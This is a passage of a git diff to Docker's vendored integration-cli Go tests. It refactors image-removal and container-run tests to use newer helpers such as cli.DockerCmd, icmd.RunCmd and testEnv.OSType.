+	cli.DockerCmd(c, "commit", containerID, "busybox-one")
 
-	imagesBefore, _ := dockerCmd(c, "images", "-a")
-	dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1")
-	dockerCmd(c, "tag", "busybox-one", "busybox-one:tag2")
+	imagesBefore := cli.DockerCmd(c, "images", "-a").Combined()
+	cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag1")
+	cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag2")
 
-	imagesAfter, _ := dockerCmd(c, "images", "-a")
+	imagesAfter := cli.DockerCmd(c, "images", "-a").Combined()
 	// tag busybox to create 2 more images with same imageID
 	c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter))
 
 	imgID := inspectField(c, "busybox-one:tag1", "Id")
 
 	// run a container with the image
-	out, _ = runSleepingContainerInImage(c, "busybox-one")
-
+	out = runSleepingContainerInImage(c, "busybox-one")
 	containerID = strings.TrimSpace(out)
 
 	// first checkout without force it fails
-	out, _, err := dockerCmdWithError("rmi", imgID)
-	expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID))
 	// rmi tagged in multiple repos should have failed without force
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, expected)
+	cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)),
+	})
 
-	dockerCmd(c, "stop", containerID)
-	dockerCmd(c, "rmi", "-f", imgID)
+	cli.DockerCmd(c, "stop", containerID)
+	cli.DockerCmd(c, "rmi", "-f", imgID)
 
-	imagesAfter, _ = dockerCmd(c, "images", "-a")
+	imagesAfter = cli.DockerCmd(c, "images", "-a").Combined()
 	// rmi -f failed, image still exists
 	c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter))
 }
 
 func (s *DockerSuite) TestRmiImgIDForce(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'")
-
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'").Combined()
 	containerID := strings.TrimSpace(out)
 
 	// Wait for it to exit as cannot commit a running container on Windows, and
 	// it will take a few seconds to exit
-	if daemonPlatform == "windows" {
-		err := waitExited(containerID, 60*time.Second)
-		c.Assert(err, check.IsNil)
+	if testEnv.OSType == "windows" {
+		cli.WaitExited(c, containerID, 60*time.Second)
 	}
 
-	dockerCmd(c, "commit", containerID, "busybox-test")
+	cli.DockerCmd(c, "commit", containerID, "busybox-test")
 
-	imagesBefore, _ := dockerCmd(c, "images", "-a")
-	dockerCmd(c, "tag", "busybox-test", "utest:tag1")
-	dockerCmd(c, "tag", "busybox-test", "utest:tag2")
-	dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3")
-	dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4")
+	imagesBefore := cli.DockerCmd(c, "images", "-a").Combined()
+	cli.DockerCmd(c, "tag", "busybox-test", "utest:tag1")
+	cli.DockerCmd(c, "tag", "busybox-test", "utest:tag2")
+	cli.DockerCmd(c, "tag", "busybox-test", "utest/docker:tag3")
+	cli.DockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4")
 	{
-		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		imagesAfter := cli.DockerCmd(c, "images", "-a").Combined()
 		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
 	}
 	imgID := inspectField(c, "busybox-test", "Id")
 
 	// first checkout without force it fails
-	out, _, err := dockerCmdWithError("rmi", imgID)
-	// rmi tagged in multiple repos should have failed without force
-	c.Assert(err, checker.NotNil)
-	// rmi tagged in multiple repos should have failed without force
-	c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err))
+	cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "(must be forced) - image is referenced in multiple repositories",
+	})
 
-	dockerCmd(c, "rmi", "-f", imgID)
+	cli.DockerCmd(c, "rmi", "-f", imgID)
 	{
-		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		imagesAfter := cli.DockerCmd(c, "images", "-a").Combined()
 		// rmi failed, image still exists
 		c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12])
 	}
@@ -147,8 +143,8 @@ func (s *DockerSuite) TestRmiImgIDForce(c *check.C) {
 // See https://github.com/docker/docker/issues/14116
 func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) {
 	dockerfile := "FROM busybox\nRUN echo test 14116\n"
-	imgID, err := buildImage("test-14116", dockerfile, false)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "test-14116", build.WithDockerfile(dockerfile))
+	imgID := getIDByName(c, "test-14116")
 
 	newTag := "newtag"
 	dockerCmd(c, "tag", imgID, newTag)
@@ -175,12 +171,11 @@ func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) {
 func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) {
 	image := "busybox-clone"
 
-	cmd := exec.Command(dockerBinary, "build", "--no-cache", "-t", image, "-")
-	cmd.Stdin = strings.NewReader(`FROM busybox
-MAINTAINER foo`)
-
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.IsNil, check.Commentf("Could not build %s: %s", image, out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "build", "--no-cache", "-t", image, "-"},
+		Stdin: strings.NewReader(`FROM busybox
+MAINTAINER foo`),
+	}).Assert(c, icmd.Success)
 
 	dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true")
 
@@ -206,14 +201,8 @@ func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) {
 	tag1 := imageName + ":tag1"
 	tag2 := imageName + ":tag2"
 
-	_, err := buildImage(tag1,
-		`FROM busybox
-		MAINTAINER "docker"`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, tag1, build.WithDockerfile(`FROM busybox
+		MAINTAINER "docker"`))
 	dockerCmd(c, "tag", tag1, tag2)
 
 	out, _ := dockerCmd(c, "rmi", "-f", tag2)
@@ -241,8 +230,8 @@ func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) {
 	imageIds := make([]string, 2)
 	for i, name := range imageNames {
 		dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name)
-		id, err := buildImage(name, dockerfile, false)
-		c.Assert(err, checker.IsNil)
+		buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+		id := getIDByName(c, name)
 		imageIds[i] = id
 	}
 
@@ -270,9 +259,7 @@ RUN echo 0 #layer0
 RUN echo 1 #layer1
 RUN echo 2 #layer2
 `
-	_, err := buildImage(image, dockerfile, false)
-	c.Assert(err, checker.IsNil)
-
+	buildImageSuccessfully(c, image, build.WithoutCache, build.WithDockerfile(dockerfile))
 	out, _ := dockerCmd(c, "history", "-q", image)
 	ids := strings.Split(out, "\n")
 	idToTag := ids[2]
@@ -295,7 +282,7 @@ RUN echo 2 #layer2
 
 	// At this point we have 2 containers, one based on layer2 and another based on layer0.
 	// Try to untag "tmp2" without the -f flag.
-	out, _, err = dockerCmdWithError("rmi", newTag)
+	out, _, err := dockerCmdWithError("rmi", newTag)
 	// should not be untagged without the -f flag
 	c.Assert(err, checker.NotNil)
 	c.Assert(out, checker.Contains, cid[:12])
@@ -308,10 +295,9 @@ RUN echo 2 #layer2
 }
 
 func (*DockerSuite) TestRmiParentImageFail(c *check.C) {
-	_, err := buildImage("test", `
+	buildImageSuccessfully(c, "test", build.WithDockerfile(`
 	FROM busybox
-	RUN echo hello`, false)
-	c.Assert(err, checker.IsNil)
+	RUN echo hello`))
 
 	id := inspectField(c, "busybox", "ID")
 	out, _, err := dockerCmdWithError("rmi", id)
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
index 9462aef800..aaaa7174d3 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
@@ -3,6 +3,7 @@ package main
 import (
 	"bufio"
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -21,17 +22,21 @@ import (
 	"sync"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/testutil"
 	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers/kernel"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/stringutils"
 	"github.com/docker/docker/runconfig"
 	"github.com/docker/go-connections/nat"
 	"github.com/docker/libnetwork/resolvconf"
 	"github.com/docker/libnetwork/types"
 	"github.com/go-check/check"
-	libcontainerUser "github.com/opencontainers/runc/libcontainer/user"
+	"gotest.tools/icmd"
 )
 
 // "test123" should be printed by docker run
@@ -66,12 +71,12 @@ func (s *DockerSuite) TestRunLeakyFileDescriptors(c *check.C) {
 // this will fail when Internet access is unavailable
 func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) {
 	testRequires(c, Network, NotArm)
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// nslookup isn't present in Windows busybox. Is built-in. Further,
 		// nslookup isn't present in nanoserver. Hence just use PowerShell...
-		dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com")
+		dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "powershell", "Resolve-DNSName", "google.com")
 	} else {
-		dockerCmd(c, "run", DefaultImage, "nslookup", "google.com")
+		dockerCmd(c, "run", "busybox", "nslookup", "google.com")
 	}
 
 }
@@ -92,12 +97,12 @@ func (s *DockerSuite) TestRunExitCodeOne(c *check.C) {
 func (s *DockerSuite) TestRunStdinPipe(c *check.C) {
 	// TODO Windows: This needs some work to make compatible.
 	testRequires(c, DaemonIsLinux)
-	runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat")
-	runCmd.Stdin = strings.NewReader("blahblah")
-	out, _, _, err := runCommandWithStdoutStderr(runCmd)
-	if err != nil {
-		c.Fatalf("failed to run container: %v, output: %q", err, out)
-	}
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"},
+		Stdin:   strings.NewReader("blahblah"),
+	})
+	result.Assert(c, icmd.Success)
+	out := result.Stdout()
 
 	out = strings.TrimSpace(out)
 	dockerCmd(c, "wait", out)
@@ -131,7 +136,7 @@ func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) {
 func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) {
 	dir := "/root"
 	image := "busybox"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		dir = `C:/Windows`
 	}
 
@@ -154,9 +159,9 @@ func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) {
 func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) {
 	count := "-c"
 	image := "busybox"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		count = "-n"
-		image = WindowsBaseImage
+		image = testEnv.PlatformDefaults.BaseImage
 	}
 
 	// First using the long form --net
@@ -289,7 +294,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) {
 	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
 	dockerCmd(c, "network", "create", "-d", "bridge", "net1")
 
-	cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top")
+	cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox:glibc", "top")
 	c.Assert(waitRun("first"), check.IsNil)
 
 	// Check if default short-id alias is added automatically
@@ -297,7 +302,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) {
 	aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases")
 	c.Assert(aliases, checker.Contains, stringid.TruncateID(id))
 
-	cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top")
+	cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top")
 	c.Assert(waitRun("second"), check.IsNil)
 
 	// Check if default short-id alias is added automatically
@@ -348,8 +353,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) {
 	)
 
 	// Create a file in a volume
-	if daemonPlatform == "windows" {
-		out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`)
+	if testEnv.OSType == "windows" {
+		out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`)
 	} else {
 		out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file")
 	}
@@ -358,8 +363,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) {
 	}
 
 	// Read the file from another container using --volumes-from to access the volume in the second container
-	if daemonPlatform == "windows" {
-		out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`)
+	if testEnv.OSType == "windows" {
+		out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `type c:\some\dir\file`)
 	} else {
 		out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file")
 	}
@@ -376,7 +381,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) {
 		containerPath string
 		cmd           string
 	)
-	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// This test cannot run on a Windows daemon as
 	// Windows does not support symlinks inside a volume path
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 	name := "test-volume-symlink"
@@ -390,7 +395,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) {
 	// In the case of Windows to Windows CI, if the machine is setup so that
 	// the temp directory is not the C: drive, this test is invalid and will
 	// not work.
-	if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" {
+	if testEnv.OSType == "windows" && strings.ToLower(dir[:1]) != "c" {
 		c.Skip("Requires TEMP to point to C: drive")
 	}
 
@@ -400,8 +405,8 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) {
 	}
 	f.Close()
 
-	if daemonPlatform == "windows" {
-		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir)
+	if testEnv.OSType == "windows" {
+		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", testEnv.PlatformDefaults.BaseImage, dir, dir)
 		containerPath = `c:\test\test`
 		cmd = "tasklist"
 	} else {
@@ -409,10 +414,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) {
 		containerPath = "/test/test"
 		cmd = "true"
 	}
-	if _, err := buildImage(name, dockerFile, false); err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile))
 	dockerCmd(c, "run", "-v", containerPath, name, cmd)
 }
 
@@ -423,13 +425,13 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) {
 		containerPath string
 		cmd           string
 	)
-	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// This test cannot run on a Windows daemon as
 	// Windows does not support symlinks inside a volume path
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 	name := "test-volume-symlink2"
 
-	if daemonPlatform == "windows" {
-		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name)
+	if testEnv.OSType == "windows" {
+		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", testEnv.PlatformDefaults.BaseImage, name, name)
 		containerPath = `c:\test\test`
 		cmd = "tasklist"
 	} else {
@@ -437,33 +439,22 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) {
 		containerPath = "/test/test"
 		cmd = "true"
 	}
-	if _, err := buildImage(name, dockerFile, false); err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile))
 	dockerCmd(c, "run", "-v", containerPath, name, cmd)
 }
 
 func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) {
-	// TODO Windows: Temporary check - remove once TP5 support is dropped
-	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
-		c.Skip("Needs later Windows build for RO volumes")
-	}
 	if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 {
 		c.Fatalf("run should fail because volume is ro: exit code %d", code)
 	}
 }
 
 func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) {
-	// TODO Windows: Temporary check - remove once TP5 support is dropped
-	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
-		c.Skip("Needs later Windows build for RO volumes")
-	}
 	var (
 		volumeDir string
 		fileInVol string
 	)
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volumeDir = `c:/test` // Forward-slash as using busybox
 		fileInVol = `c:/test/file`
 	} else {
@@ -484,7 +475,7 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) {
 		volumeDir string
 		fileInVol string
 	)
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volumeDir = `c:/test` // Forward-slash as using busybox
 		fileInVol = `c:/test/file`
 	} else {
@@ -505,16 +496,12 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) {
 func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) {
 	testRequires(c, SameHostDaemon)
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	hostpath := randomTmpDirPath("test", daemonPlatform)
+	hostpath := RandomTmpDirPath("test", testEnv.OSType)
 	if err := os.MkdirAll(hostpath, 0755); err != nil {
 		c.Fatalf("Failed to create %s: %q", hostpath, err)
 	}
 	defer os.RemoveAll(hostpath)
 
-	// TODO Windows: Temporary check - remove once TP5 support is dropped
-	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
-		c.Skip("Needs later Windows build for RO volumes")
-	}
 	dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true")
 
 	// Expect this "rw" mode to be be ignored since the inherited volume is "ro"
@@ -532,11 +519,11 @@ func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) {
 
 // Test for GH#10618
 func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) {
-	path1 := randomTmpDirPath("test1", daemonPlatform)
-	path2 := randomTmpDirPath("test2", daemonPlatform)
+	path1 := RandomTmpDirPath("test1", testEnv.OSType)
+	path2 := RandomTmpDirPath("test2", testEnv.OSType)
 
 	someplace := ":/someplace"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Windows requires that the source directory exists before calling HCS
 		testRequires(c, SameHostDaemon)
 		someplace = `:c:\someplace`
@@ -585,7 +572,7 @@ func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) {
 // Test for #1351
 func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) {
 	prefix := ""
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		prefix = `c:`
 	}
 	dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo")
@@ -594,7 +581,7 @@ func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) {
 
 func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) {
 	prefix := ""
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		prefix = `c:`
 	}
 	dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo")
@@ -624,7 +611,7 @@ func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) {
 // Test that creating a container with a volume doesn't crash. Regression test for #995.
 func (s *DockerSuite) TestRunCreateVolume(c *check.C) {
 	prefix := ""
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		prefix = `c:`
 	}
 	dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true")
@@ -635,13 +622,14 @@ func (s *DockerSuite) TestRunCreateVolume(c *check.C) {
 func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) {
 	// Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...)
 	testRequires(c, DaemonIsLinux)
+	workingDirectory, err := ioutil.TempDir("", "TestRunCreateVolumeWithSymlink")
 	image := "docker-test-createvolumewithsymlink"
 
 	buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-")
 	buildCmd.Stdin = strings.NewReader(`FROM busybox
 		RUN ln -s home /bar`)
 	buildCmd.Dir = workingDirectory
-	err := buildCmd.Run()
+	err = buildCmd.Run()
 	if err != nil {
 		c.Fatalf("could not build '%s': %v", image, err)
 	}
@@ -667,18 +655,21 @@ func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) {
 
 // Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`.
 func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) {
-	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// This test cannot run on a Windows daemon as
 	// Windows does not support symlinks inside a volume path
 	testRequires(c, DaemonIsLinux)
+
+	workingDirectory, err := ioutil.TempDir("", "TestRunVolumesFromSymlinkPath")
+	c.Assert(err, checker.IsNil)
 	name := "docker-test-volumesfromsymlinkpath"
 	prefix := ""
 	dfContents := `FROM busybox
 		RUN ln -s home /foo
 		VOLUME ["/foo/bar"]`
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		prefix = `c:`
-		dfContents = `FROM ` + WindowsBaseImage + `
+		dfContents = `FROM ` + testEnv.PlatformDefaults.BaseImage + `
 	    RUN mkdir c:\home
 		RUN mklink /D c:\foo c:\home
 		VOLUME ["c:/foo/bar"]
@@ -688,7 +679,7 @@ func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) {
 	buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-")
 	buildCmd.Stdin = strings.NewReader(dfContents)
 	buildCmd.Dir = workingDirectory
-	err := buildCmd.Run()
+	err = buildCmd.Run()
 	if err != nil {
 		c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err)
 	}
@@ -722,7 +713,7 @@ func (s *DockerSuite) TestRunExitCode(c *check.C) {
 
 func (s *DockerSuite) TestRunUserDefaults(c *check.C) {
 	expected := "uid=0(root) gid=0(root)"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)"
 	}
 	out, _ := dockerCmd(c, "run", "busybox", "id")
@@ -759,7 +750,7 @@ func (s *DockerSuite) TestRunUserByIDBig(c *check.C) {
 	if err == nil {
 		c.Fatal("No error, but must be.", out)
 	}
-	if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) {
+	if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") {
 		c.Fatalf("expected error about uids range, got %s", out)
 	}
 }
@@ -772,7 +763,7 @@ func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) {
 	if err == nil {
 		c.Fatal("No error, but must be.", out)
 	}
-	if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) {
+	if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") {
 		c.Fatalf("expected error about uids range, got %s", out)
 	}
 }
@@ -826,21 +817,21 @@ func (s *DockerSuite) TestRunEnvironment(c *check.C) {
 	// TODO Windows: Environment handling is different between Linux and
 	// Windows and this test relies currently on unix functionality.
 	testRequires(c, DaemonIsLinux)
-	cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env")
-	cmd.Env = append(os.Environ(),
-		"TRUE=false",
-		"TRICKY=tri\ncky\n",
-	)
-
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env"},
+		Env: append(os.Environ(),
+			"TRUE=false",
+			"TRICKY=tri\ncky\n",
+		),
+	})
+	result.Assert(c, icmd.Success)
 
-	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	actualEnv := strings.Split(strings.TrimSuffix(result.Stdout(), "\n"), "\n")
 	sort.Strings(actualEnv)
 
 	goodEnv := []string{
+		// The first two should not be tested here, those are "inherent" environment variable. This test validates
+		// the -e behavior, not the default environment variable (that could be subject to change)
 		"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
 		"HOSTNAME=testing",
 		"FALSE=true",
@@ -870,15 +861,13 @@ func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) {
 	// not set in our local env that they're removed (if present) in
 	// the container
 
-	cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env")
-	cmd.Env = appendBaseEnv(true)
-
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env"},
+		Env:     appendBaseEnv(true),
+	})
+	result.Assert(c, icmd.Success)
 
-	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n")
 	sort.Strings(actualEnv)
 
 	goodEnv := []string{
@@ -904,15 +893,13 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) {
 	// Test to make sure that when we use -e on env vars that are
 	// already in the env that we're overriding them
 
-	cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env")
-	cmd.Env = appendBaseEnv(true, "HOSTNAME=bar")
-
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env"},
+		Env:     appendBaseEnv(true, "HOSTNAME=bar"),
+	})
+	result.Assert(c, icmd.Success)
 
-	actualEnv := strings.Split(strings.TrimSpace(out), "\n")
+	actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n")
 	sort.Strings(actualEnv)
 
 	goodEnv := []string{
@@ -932,9 +919,9 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) {
 }
 
 func (s *DockerSuite) TestRunContainerNetwork(c *check.C) {
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Windows busybox does not have ping. Use built in ping instead.
-		dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1")
+		dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1")
 	} else {
 		dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1")
 	}
@@ -1232,7 +1219,7 @@ func (s *DockerSuite) TestRunModeHostname(c *check.C) {
 func (s *DockerSuite) TestRunRootWorkdir(c *check.C) {
 	out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd")
 	expected := "/\n"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = "C:" + expected
 	}
 	if out != expected {
@@ -1241,9 +1228,9 @@ func (s *DockerSuite) TestRunRootWorkdir(c *check.C) {
 }
 
 func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) {
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Windows busybox will fail with Permission Denied on items such as pagefile.sys
-		dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`)
+		dockerCmd(c, "run", "-v", `c:\:c:\host`, testEnv.PlatformDefaults.BaseImage, "cmd", "-c", "dir", `c:\host`)
 	} else {
